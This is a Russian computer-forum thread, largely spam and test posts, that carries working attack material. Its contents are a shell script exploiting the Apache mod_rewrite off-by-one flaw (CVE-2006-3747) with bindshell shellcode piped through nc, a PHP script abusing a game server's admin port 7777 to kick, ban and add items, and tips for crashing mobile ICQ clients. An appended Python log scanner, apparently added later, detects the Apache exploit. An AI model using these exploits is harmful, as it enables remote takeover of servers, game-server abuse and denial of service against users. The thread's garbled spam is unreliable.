Всё о компьютерах (All About Computers)



ITA Forum <= 1.49 SQL Injection Exploit Vulnerability


1

Exploit text:

0

2

How I want to read this text

0

3

Ghbdtn!

0

4

Sid24 wrote:

And I never did get to read it :)

0

5

11321

0

6

gdsfvbdb

0

7

hhhhhhhhhhhhh es fgcc
jhbhh

0

8

WebShop.E-Katalog™WebShop.E-Katalog™WebShop.E-Katalog™WebShop.E-Katalog™

0

9

ымыимло

0

10

ss

0

11

ssddddddd

0

12

gertergerg

0

13

asdasdasdasdsadadqeq

0

14

zxcxzcasfaff

0

15

1

0

16

4

0

17

1

0

18

2

0

19

3

0

20

4

0

21

5

0

22

I was just testing a little something!!!! It was fun!!! I sent users of mobile ICQ this code (/font -z $null …) and they got kicked off!!! But the most annoying thing is that with some phone models this trick doesn't work... =( Here are the phone models that glitch really badly, no joke:
Sony Ericsson K300I
Sony Ericsson K700I
Nokia 6085
Nokia 5200
Nokia 6300
Sony Ericsson W610I
Asus P256
Sony Ericsson K750I made before 2006
Nokia 6230

Those are the phones I managed to test... =) I nearly got killed for it =)

0

23

Aha!!! Here's another one: you send dots, anywhere from 700 up to the maximum possible, to mobile ICQ and, oddly enough, it kicks them off too; I think it overflows the cache memory and that's it, the phone reboots =)

0

24

Aaaaaaa I want to read the text, to see it aaaaa

0

25

491177258 write to me

#!/bin/sh

# To know if your apache vulnerable version could be successful
# exploited, write this rule in your httpd.conf or .htaccess file:

# RewriteRule kung/(.*) $1

# And try to access to the following URL:
# /kung/ldap://localhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA%3FAAAAAAAAAAAAAAA%3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB

# If your web server doesn't reply you with a '302 Found' page or a
# Segmentation Fault appears in your error_log, an apache child has
# crashed and your web server is vulnerable and exploitable.

# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate addresses.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez :P

echo -e "mod_rewrite apache off-by-one overflow\nby jack <jack\x40gulcas\x2eorg>\n\n"

if [ $# -ne 1 ] ; then
echo "Usage: $0 webserver"
exit
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\nHost:$host\r\n\r\n" | nc $host 80 (нннняяяяяяя)

0
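
An added detection example, not part of the original post or the exploit author's code: it scans Apache access-log lines for the request shape the script's comments describe (an `ldap://` URL in the path followed by percent-encoded `?` characters) and the error_log for the segmentation-fault notice they mention. The log lines, the function names and the threshold of five are assumptions made here; the threshold matches the five `%3F` in the test URL above.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not from the post): Apache access log and error_log.
ACCESS_LOG = [
    '192.0.2.10 - - [20/Aug/2006:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.77 - - [20/Aug/2006:12:00:05 +0000] '
    '"GET /kung/ldap://localhost/AAAA%3FAAAA%3FAAAA%3FAA%3FAA%3FBBBB HTTP/1.1" 302 290',
    '192.0.2.11 - - [20/Aug/2006:12:00:09 +0000] '
    '"GET /search?q=ldap://directory.example/%3F HTTP/1.1" 200 1024',
]
ERROR_LOG = [
    '[Sun Aug 20 12:00:07 2006] [notice] child pid 4711 exit signal Segmentation fault (11)',
    '[Sun Aug 20 12:00:08 2006] [error] File does not exist: /var/www/favicon.ico',
]

REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
LDAP_RE = re.compile(r'ldap:/+', re.IGNORECASE)
SEGV_RE = re.compile(r'child pid (\d+) exit signal Segmentation fault')
QMARK_THRESHOLD = 5  # assumption: the test URL in the post carries five %3F

def ldap_qmarks(target):
    """Count '?' after an ldap:// URL embedded in the path (escapes decoded once)."""
    path = unquote(target.split('?', 1)[0])  # a literal '?' starts the query string
    m = LDAP_RE.search(path)
    return path[m.end():].count('?') if m else 0

def scan_access(lines):
    """Return (client, status, qmarks) for requests matching the probe shape."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and (n := ldap_qmarks(m['target'])) >= QMARK_THRESHOLD:
            hits.append((m['client'], int(m['status']), n))
    return hits

def crashed_children(lines):
    """Return pids of Apache children that died with a segmentation fault."""
    return [int(m.group(1)) for line in lines if (m := SEGV_RE.search(line))]

if __name__ == '__main__':
    for client, status, n in scan_access(ACCESS_LOG):
        print(f'{client}: ldap:// in path with {n} encoded "?" (status {status})')
    print('segfaulted children:', crashed_children(ERROR_LOG))
```

A child that crashes while handling the request may never write its access-log entry, so a segfault notice with no matching request is worth correlating by timestamp.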

26

# Bug with port 7777:
# PHP code:
<?
$char_name='char_name';
$fp = fsockopen("server-ip", 7777, $errno, $errstr);
if (!$fp) {
echo "$errstr ($errno)<br/>\n";
} else {
$out = "5"."\t".$char_name."\t"."\r\n";
fwrite($fp, $out);
stream_set_timeout($fp, 2);
$answ = fgets($fp,8);
if ($answ==1) {
print"Character is successfully kicked.";
} else {
print"Error.";
}
fclose($fp);
}
?>

# The script above kicks the player with the nickname "char_name" from the server "server-ip"
# if you play around with the string being sent, you can abuse the server however you like...
# here are examples of some strings:
# PHP code:

// $out = "5"."\t".$char_name."\t"."\r\n"; // kick
// $out = "5\t{$char_name}\t\r\n"; // kick
// $out = "6\t{$char_name}\t5\t5\t\r\n"; // skill add
// $out = "4\tprobe2\tprobe\t\r\n"; // CHANGE_CHARACTER_NAME
// $out = "39\ttester\t1\t\r\n"; // BAN_CHAR
// $out = "50\tasd\ttester\t1\t1\t\t\t\t\r\n"; // MAN_ANNOUNCE ?
// $out = "45\tprobe\t\t\r\n"; // SEND_HOME ?
// $out = "12\tprobe\t0\t57\t10\t0\t0\t0\t0\t0\t\t\r\n"; // ADD_ITEM
// $out = "12\tprobe\t0\t1148\t1\t0\t0\t0\t0\t0\t\t\r\n" ; // ADD_ITEM

0

27

1

0

28

2

0

29

3

0

30

4

0

